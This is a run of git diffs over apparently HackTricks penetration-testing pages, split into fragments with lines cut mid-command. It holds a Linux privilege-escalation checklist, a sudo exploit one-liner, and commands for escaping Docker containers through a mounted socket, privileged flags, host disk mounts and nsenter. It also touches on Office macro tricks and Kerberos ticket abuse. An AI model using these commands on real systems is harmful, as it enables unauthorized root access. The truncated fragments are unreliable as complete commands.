Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.\
@@ -31,14 +30,14 @@ assoc | findstr /i "word excel powerp"
DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.
-## Word with external image
+### Word with external image
Go to: _Insert --> Quick Parts --> Field_\
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\Support HackTricks and get benefits!
@@ -84,5 +82,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,25 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
-{% hint style="warning" %}
-**Support HackTricks and get benefits!**
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
-Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-{% endhint %}
-
-## **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
-
-## [System Information](privilege-escalation/#system-information)
+### [System Information](privilege-escalation/#system-information)
* [ ] Get **OS information**
* [ ] Check the [**PATH**](privilege-escalation/#path), any **writable folder**?
@@ -45,18 +29,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] More system enum ([date, system stats, cpu info, printers](privilege-escalation/#more-system-enumeration))
* [ ] [Enumerate more defenses](privilege-escalation/#enumerate-possible-defenses)
-## [Drives](privilege-escalation/#drives)
+### [Drives](privilege-escalation/#drives)
* [ ] **List mounted** drives
* [ ] **Any unmounted drive?**
* [ ] **Any creds in fstab?**
-## [**Installed Software**](privilege-escalation/#installed-software)
+### [**Installed Software**](privilege-escalation/#installed-software)
* [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
* [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
-## [Processes](privilege-escalation/#processes)
+### [Processes](privilege-escalation/#processes)
* [ ] Is any **unknown software running**?
* [ ] Is any software with **more privileges that it should have running**?
@@ -65,40 +49,40 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] **Monitor processes** and check if any interesting process is running frequently
* [ ] Can you **read** some interesting **process memory** (where passwords could be saved)?
-## [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs)
+### [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs)
* [ ] Is the [**PATH** ](privilege-escalation/#cron-path)being modified by some cron and you can **write** in it?
* [ ] Any [**wildcard** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job?
* [ ] Some [**modifiable script** ](privilege-escalation/#cron-script-overwriting-and-symlink)is being **executed** or is inside **modifiable folder**?
* [ ] Have you detected that some **script** could be being [**executed** very **frequently**](privilege-escalation/#frequent-cron-jobs)? (every 1, 2 or 5 minutes)
-## [Services](privilege-escalation/#services)
+### [Services](privilege-escalation/#services)
* [ ] Any **writable .service** file?
* [ ] Any **writable binary** executed by a **service**?
* [ ] Any **writable folder in systemd PATH**?
-## [Timers](privilege-escalation/#timers)
+### [Timers](privilege-escalation/#timers)
* [ ] Any **writable timer**?
-## [Sockets](privilege-escalation/#sockets)
+### [Sockets](privilege-escalation/#sockets)
* [ ] Any **writable .socket** file?
* [ ] Can you **communicate with any socket**?
* [ ] **HTTP sockets** with interesting info?
-## [D-Bus](privilege-escalation/#d-bus)
+### [D-Bus](privilege-escalation/#d-bus)
* [ ] Can you **communicate with any D-Bus**?
-## [Network](privilege-escalation/#network)
+### [Network](privilege-escalation/#network)
* [ ] Enumerate the network to know where you are
* [ ] **Open ports you couldn't access before** getting a shell inside the machine?
* [ ] Can you **sniff traffic** using `tcpdump`?
-## [Users](privilege-escalation/#users)
+### [Users](privilege-escalation/#users)
* [ ] Generic users/groups **enumeration**
* [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**?
@@ -107,11 +91,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Password Policy?
* [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without password.
-## [Writable PATH](privilege-escalation/#writable-path-abuses)
+### [Writable PATH](privilege-escalation/#writable-path-abuses)
* [ ] If you have **write privileges over some folder in PATH** you may be able to escalate privileges
-## [SUDO and SUID commands](privilege-escalation/#sudo-and-suid)
+### [SUDO and SUID commands](privilege-escalation/#sudo-and-suid)
* [ ] Can you execute **any comand with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root? ([**GTFOBins**](https://gtfobins.github.io))
* [ ] Is any **exploitable suid binary**? ([**GTFOBins**](https://gtfobins.github.io))
@@ -125,25 +109,25 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) command
-## [Capabilities](privilege-escalation/#capabilities)
+### [Capabilities](privilege-escalation/#capabilities)
* [ ] Has any binary any **unexpected capability**?
-## [ACLs](privilege-escalation/#acls)
+### [ACLs](privilege-escalation/#acls)
* [ ] Has any file any **unexpected ACL**?
-## [Open Shell sessions](privilege-escalation/#open-shell-sessions)
+### [Open Shell sessions](privilege-escalation/#open-shell-sessions)
* [ ] **screen**
* [ ] **tmux**
-## [SSH](privilege-escalation/#ssh)
+### [SSH](privilege-escalation/#ssh)
* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
* [ ] [**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)
-## [Interesting Files](privilege-escalation/#interesting-files)
+### [Interesting Files](privilege-escalation/#interesting-files)
* [ ] **Profile files** - Read sensitive data? Write to privesc?
* [ ] **passwd/shadow files** - Read sensitive data? Write to privesc?
@@ -158,19 +142,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
* [ ] **Generic search**
-## [**Writable Files**](privilege-escalation/#writable-files)
+### [**Writable Files**](privilege-escalation/#writable-files)
* [ ] **Modify python library** to execute arbitrary commands?
* [ ] Can you **modify log files**? **Logtotten** exploit
* [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
* [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
-## [**Other tricks**](privilege-escalation/#other-tricks)
+### [**Other tricks**](privilege-escalation/#other-tricks)
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
-
Support HackTricks and get benefits!
@@ -186,5 +169,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# OS info
+## OS info
Let's starting gaining some knowledge of the OS running
@@ -27,7 +26,7 @@ lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems
```
-# Path
+## Path
If you **have write permissions on any folder inside the `PATH`** variable you may be able to hijacking some libraries or binaries:
@@ -35,7 +34,7 @@ If you **have write permissions on any folder inside the `PATH`** variable you m
echo $PATH
```
-# Env info
+## Env info
Interesting information, passwords or API keys in the environment variables?
@@ -43,7 +42,7 @@ Interesting information, passwords or API keys in the environment variables?
(env || set) 2>/dev/null
```
-# Kernel exploits
+## Kernel exploits
Check the kernel version and if there is some exploit that can be used to escalate privileges
@@ -70,7 +69,7 @@ Tools that could help searching for kernel exploits are:
Always **search the kernel version in Google**, maybe your kernel version is wrote in some kernel exploit and then you will be sure that this exploit is valid.
-# CVE-2016-5195 (DirtyCow)
+## CVE-2016-5195 (DirtyCow)
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
@@ -82,7 +81,7 @@ https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
```
-# Sudo version
+## Sudo version
Based on the vulnerable sudo versions that appear in:
@@ -96,7 +95,7 @@ You can check if the sudo version is vulnerable using this grep.
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
```
-# sudo < v1.28
+## sudo < v1.28
From @sickrov
@@ -104,7 +103,7 @@ From @sickrov
sudo -u#-1 /bin/bash
```
-# Dmesg signature verification failed
+## Dmesg signature verification failed
Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited
@@ -112,7 +111,7 @@ Check **smasher2 box of HTB** for an **example** of how this vuln could be explo
dmesg 2>/dev/null | grep "signature"
```
-# More system enumeration
+## More system enumeration
```bash
date 2>/dev/null #Date
@@ -121,9 +120,9 @@ lscpu #CPU info
lpstat -a 2>/dev/null #Printers info
```
-# Enumerate possible defenses
+## Enumerate possible defenses
-## AppArmor
+### AppArmor
```bash
if [ `which aa-status 2>/dev/null` ]; then
@@ -137,38 +136,38 @@ if [ `which aa-status 2>/dev/null` ]; then
fi
```
-## Grsecurity
+### Grsecurity
```bash
((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")
```
-## PaX
+### PaX
```bash
(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")
```
-## Execshield
+### Execshield
```bash
(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")
```
-## SElinux
+### SElinux
```bash
(sestatus 2>/dev/null || echo "Not found sestatus")
```
-## ASLR
+### ASLR
```bash
cat /proc/sys/kernel/randomize_va_space 2>/dev/null
#If 0, not enabled
```
-# Docker Breakout
+## Docker Breakout
If you are inside a docker container you can try to escape from it:
@@ -176,7 +175,7 @@ If you are inside a docker container you can try to escape from it:
[docker-breakout](docker-breakout/)
{% endcontent-ref %}
-# Drives
+## Drives
Check **what is mounted and unmounted**, where and why. If anything is unmounted you could try to mount it and check for private info
@@ -187,9 +186,9 @@ cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null
```
-# Installed Software
+## Installed Software
-# Useful software
+## Useful software
Enumerate useful binaries
@@ -203,7 +202,7 @@ Also, check if **any compiler is installed**. This is useful if you need to use
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
```
-# Vulnerable Software Installed
+## Vulnerable Software Installed
Check for the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges…\
It is recommended to check manually the version of the more suspicious installed software.
@@ -219,7 +218,7 @@ If you have SSH access to the machine you could also use **openVAS** to check fo
_Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended some application like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits_
{% endhint %}
-# Processes
+## Processes
Take a look to **what processes** are being executed and check if any process has **more privileges than it should** (maybe a tomcat being executed by root?)
@@ -232,11 +231,11 @@ top -n 1
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\
Also **check your privileges over the processes binaries**, maybe you can overwrite someone.
-# Process monitoring
+## Process monitoring
You can use tools like [**pspy**](https://github.com/DominicBreuker/pspy) to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met.
-# Process memory
+## Process memory
Some services of a server save **credentials in clear text inside the memory**.\
Normally you will need **root privileges** to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials.\
@@ -253,7 +252,7 @@ The file _**/proc/sys/kernel/yama/ptrace\_scope**_ controls the accessibility of
* **kernel.yama.ptrace\_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again.
{% endhint %}
-## GDB
+### GDB
If you have access to the memory of a FTP service (for example) you could get the Heap and search inside of it the credentials.
@@ -266,7 +265,7 @@ gdb -p Support HackTricks and get benefits!
@@ -1575,5 +1573,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,16 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic information
+## Basic information
Go to the following link to learn **what is containerd** and `ctr`:
-{% content-ref url="../../pentesting/2375-pentesting-docker.md" %}
-[2375-pentesting-docker.md](../../pentesting/2375-pentesting-docker.md)
+{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
+[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}
-# PE 1
+## PE 1
if you find that a host contains the `ctr` command:
@@ -49,7 +48,7 @@ And then **run one of those images mounting the host root folder to it**:
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
-# PE 2
+## PE 2
Run a container privileged and escape from it.\
You can run a privileged container as:
@@ -64,7 +63,6 @@ Then you can use some of the techniques mentioned in the following page to **esc
[docker-breakout](docker-breakout/)
{% endcontent-ref %}
-
Support HackTricks and get benefits!
@@ -80,5 +78,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,17 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# **Basic Docker Engine Security**
+## **Basic Docker Engine Security**
Docker engine does the heavy lifting of running and managing Containers. Docker engine uses Linux kernel features like **Namespaces** and **Cgroups** to provide basic **isolation** across Containers. Advanced isolation can be achieved using Linux kernel features like **Capabilities**, **Seccomp**, **SELinux/AppArmor**. Docker exposes these Linux kernel capabilities either at Docker daemon level or at each Container level.
-Finally, an **auth plugin** can be used to **limit the actions** users can perform.\
-
+Finally, an **auth plugin** can be used to **limit the actions** users can perform.\\
 (1) (1).png>)
-## **Docker engine secure access**
+### **Docker engine secure access**
Docker client can access Docker engine **locally using Unix socket or remotely using http** mechanism. To use it remotely, it is needed to use https and **TLS** so that confidentiality, integrity and authentication can be ensured.
@@ -41,7 +39,7 @@ Sudo service docker restart -> Restart Docker daemon
Exposing Docker daemon using http is not a good practice and it is needed to secure the connection using https. There are two options: first option is for **client to verify server identity** and in second option **both client and server verify each other’s identity**. Certificates establish the identity of a server. For an example of both options [**check this page**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/).
-## **Container image security**
+### **Container image security**
Container images are stored either in private repository or public repository. Following are the options that Docker provides for storing Container images:
@@ -49,13 +47,13 @@ Container images are stored either in private repository or public repository. F
* [Docker registry](https://github.com/%20docker/distribution) – This is an open source project that users can use to host their own registry.
* [Docker trusted registry](https://www.docker.com/docker-trusted-registry) – This is Docker’s commercial implementation of Docker registry and it provides role based user authentication along with LDAP directory service integration.
-## Image Scanning
+### Image Scanning
Containers can have **security vulnerabilities** either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes.
For more [**information read this**](https://docs.docker.com/engine/scan/).
-### How to scan images
+#### How to scan images
The `docker scan` command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image:
@@ -75,7 +73,7 @@ Licenses: enabled
Note that we do not currently have vulnerability data for your image.
```
-## Docker Image Signing
+### Docker Image Signing
Docker Container images can be stored either in public or private registry. It is needed to **sign** **Container** images to be able to confirm images haven't being tampered. Content **publisher** takes care of **signing** Container image and pushing it into the registry.\
Following are some details on Docker content trust:
@@ -115,9 +113,9 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
-# Containers Security Improvements
+## Containers Security Improvements
-## Namespaces
+### Namespaces
**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces.
@@ -135,7 +133,7 @@ For **more information about the namespaces** check the following page:
[namespaces.md](namespaces.md)
{% endcontent-ref %}
-## cgroups
+### cgroups
Linux kernel feature **cgroups** provides capability to **restrict resources like cpu, memory, io, network bandwidth among** a set of processes. Docker allows to create Containers using cgroup feature which allows for resource control for the specific Container.\
Following is a Container created with user space memory limited to 500m, kernel memory limited to 50m, cpu share to 512, blkioweight to 400. CPU share is a ratio that controls Container’s CPU usage. It has a default value of 1024 and range between 0 and 1024. If three Containers have the same CPU share of 1024, each Container can take upto 33% of CPU in case of CPU resource contention. blkio-weight is a ratio that controls Container’s IO. It has a default value of 500 and range between 10 and 1000.
@@ -152,7 +150,7 @@ ps -ef | grep 1234 #Get info about the sleep process
ls -l /proc/Support HackTricks and get benefits!
@@ -368,5 +365,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
There are some occasions were you just have **access to the docker socket** and you want to use it to **escalate privileges**. Some actions might be very suspicious and you may want to avoid them, so here you can find different flags that can be useful to escalate privileges:
-## Via mount
+### Via mount
You can **mount** different parts of the **filesystem** in a container running as root and **access** them.\
You could also **abuse a mount to escalate privileges** inside the container.
@@ -35,7 +34,7 @@ You could also **abuse a mount to escalate privileges** inside the container.
* `--userns=host`
* `--uts=host`
* `--cgroupns=host`
-* **`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` ** -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt`
+* \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt`
* Run `fdisk -l` in the host to find the `` device to mount
* **`-v /tmp:/host`** -> If for some reason you can **just mount some directory** from the host and you have access inside the host. Mount it and create a **`/bin/bash`** with **suid** in the mounted directory so you can **execute it from the host and escalate to root**.
@@ -47,12 +46,12 @@ Note that maybe you cannot mount the folder `/tmp` but you can mount a **differe
Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`)
{% endhint %}
-## Escaping from the container
+### Escaping from the container
-* **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation.md#automatic-enumeration-and-escape).
+* **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape).
* **`--cap-add=Support HackTricks and get benefits!
@@ -76,5 +74,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Automatic Enumeration & Escape
+## Automatic Enumeration & Escape
* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers**
* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically**
@@ -25,7 +24,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers
* [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image
-# Mounted Docker Socket Escape
+## Mounted Docker Socket Escape
If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\
This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions.
@@ -49,7 +48,7 @@ docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash
In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`**
{% endhint %}
-Docker daemon might be also [listening in a port (by default 2375, 2376)](../../../pentesting/2375-pentesting-docker.md) or on Systemd-based systems, communication with the Docker daemon can occur over the Systemd socket `fd://`.
+Docker daemon might be also [listening in a port (by default 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) or on Systemd-based systems, communication with the Docker daemon can occur over the Systemd socket `fd://`.
{% hint style="info" %}
Additionally, pay attention to the runtime sockets of other high-level runtimes:
@@ -62,7 +61,7 @@ Additionally, pay attention to the runtime sockets of other high-level runtimes:
* ...
{% endhint %}
-# Capabilities Abuse Escape
+## Capabilities Abuse Escape
You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`**
@@ -74,11 +73,11 @@ capsh --print
In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges:
-{% content-ref url="../linux-capabilities.md" %}
-[linux-capabilities.md](../linux-capabilities.md)
+{% content-ref url="../../linux-capabilities.md" %}
+[linux-capabilities.md](../../linux-capabilities.md)
{% endcontent-ref %}
-# Escape from Privileged Containers
+## Escape from Privileged Containers
A privileged container can be created with the flag `--privileged` or disabling specific defenses:
@@ -93,11 +92,11 @@ A privileged container can be created with the flag `--privileged` or disabling
The `--privileged` flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. You can r**ead all the effects of `--privileged`** in this page:
-{% content-ref url="docker-privileged.md" %}
-[docker-privileged.md](docker-privileged.md)
+{% content-ref url="../docker-privileged.md" %}
+[docker-privileged.md](../docker-privileged.md)
{% endcontent-ref %}
-## Privileged + hostPID
+### Privileged + hostPID
With these permissions you can just **move to the namespace of a process running in the host as root** like init (pid:1) just running: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash`
@@ -107,7 +106,7 @@ Test it in a container executing:
docker run --rm -it --pid=host --privileged ubuntu bash
```
-## Privileged
+### Privileged
Just with the privileged flag you can try to **access the host's disk** or try to **escape abusing release\_agent or other escapes**.
@@ -117,7 +116,7 @@ Test the following bypasses in a container executing:
docker run --rm -it --privileged ubuntu bash
```
-### Mounting Disk - Poc1
+#### Mounting Disk - Poc1
Well configured docker containers won't allow command like **fdisk -l**. However on miss-configured docker command where the flag `--privileged` or `--device=/dev/sda1` with caps is specified, it is possible to get the privileges to see the host drive.
@@ -132,7 +131,7 @@ mount /dev/sda1 /mnt/hola
And voilà ! You can now access the filesystem of the host because it is mounted in the `/mnt/hola` folder.
-### Mounting Disk - Poc2
+#### Mounting Disk - Poc2
Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector:
@@ -157,7 +156,7 @@ mount: /mnt: permission denied. ---> Failed! but if not, you may have access to
debugfs /dev/sda1
```
-### Privileged Escape Abusing release\_agent - PoC1
+#### Privileged Escape Abusing release\_agent - PoC1
{% code title="Initial PoC" %}
```bash
@@ -195,7 +194,7 @@ cat /o
```
{% endcode %}
-### Privileged Escape Abusing release\_agent - PoC2
+#### Privileged Escape Abusing release\_agent - PoC2
{% code title="Second PoC" %}
```bash
@@ -243,16 +242,16 @@ cat /output
Find an **explanation of the technique** in:
-{% content-ref url="docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md" %}
-[docker-release\_agent-cgroups-escape.md](docker-breakout-privilege-escalation/docker-release\_agent-cgroups-escape.md)
+{% content-ref url="docker-release_agent-cgroups-escape.md" %}
+[docker-release\_agent-cgroups-escape.md](docker-release\_agent-cgroups-escape.md)
{% endcontent-ref %}
-### Privileged Escape Abusing release\_agent without known the relative path - PoC3
+#### Privileged Escape Abusing release\_agent without known the relative path - PoC3
In the previous exploits the **absolute path of the continer inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the continer inside the host** you can use this technique:
-{% content-ref url="docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md" %}
-[release\_agent-exploit-relative-paths-to-pids.md](docker-breakout-privilege-escalation/release\_agent-exploit-relative-paths-to-pids.md)
+{% content-ref url="release_agent-exploit-relative-paths-to-pids.md" %}
+[release\_agent-exploit-relative-paths-to-pids.md](release\_agent-exploit-relative-paths-to-pids.md)
{% endcontent-ref %}
```bash
@@ -345,24 +344,24 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
-### Privileged Escape Abusing Sensitive Mounts
+#### Privileged Escape Abusing Sensitive Mounts
There are several files that might mounted that give **information about the underlaying host**. Some of them may even indicate **something to be executed by the host when something happens** (which will allow a attacker to escape from the container).\
The abuse of these files may allow that:
* release\_agent (already covered before)
-* [binfmt\_misc](docker-breakout-privilege-escalation/sensitive-mounts.md#proc-sys-fs-binfmt\_misc)
-* [core\_pattern](docker-breakout-privilege-escalation/sensitive-mounts.md#proc-sys-kernel-core\_pattern)
-* [uevent\_helper](docker-breakout-privilege-escalation/sensitive-mounts.md#sys-kernel-uevent\_helper)
-* [modprobe](docker-breakout-privilege-escalation/sensitive-mounts.md#proc-sys-kernel-modprobe)
+* [binfmt\_misc](sensitive-mounts.md#proc-sys-fs-binfmt\_misc)
+* [core\_pattern](sensitive-mounts.md#proc-sys-kernel-core\_pattern)
+* [uevent\_helper](sensitive-mounts.md#sys-kernel-uevent\_helper)
+* [modprobe](sensitive-mounts.md#proc-sys-kernel-modprobe)
However, you can find **other sensitive files** to check for in this page:
-{% content-ref url="docker-breakout-privilege-escalation/sensitive-mounts.md" %}
-[sensitive-mounts.md](docker-breakout-privilege-escalation/sensitive-mounts.md)
+{% content-ref url="sensitive-mounts.md" %}
+[sensitive-mounts.md](sensitive-mounts.md)
{% endcontent-ref %}
-## Arbitrary Mounts
+### Arbitrary Mounts
In several occasions you will find that the **container has some volume mounted from the host**. If this volume wasn’t correctly configured you might be able to **access/modify sensitive data**: Read secrets, change ssh authorized\_keys…
@@ -370,7 +369,7 @@ In several occasions you will find that the **container has some volume mounted
docker run --rm -it -v /:/host ubuntu bash
```
-## hostPID
+### hostPID
If you can access the processes of the host you are going to be able to access a lot of sensitive information stored in those processes. Run test lab:
@@ -409,7 +408,7 @@ You can also **kill processes and cause a DoS**.
If you somehow has privileged **access over a process outside of the container**, you could run something like `nsenter --target Support HackTricks and get benefits!
@@ -500,5 +498,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,24 +16,23 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
A linux machine can also be present inside an Active Directory environment.
A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
-## General enumeration
+### General enumeration
If you have access over an AD in linux (or bash in Windows) you can try [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) to enumerate the AD.
-## Pass The Ticket
+### Pass The Ticket
In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack:
-{% content-ref url="../../windows/active-directory-methodology/pass-the-ticket.md" %}
-[pass-the-ticket.md](../../windows/active-directory-methodology/pass-the-ticket.md)
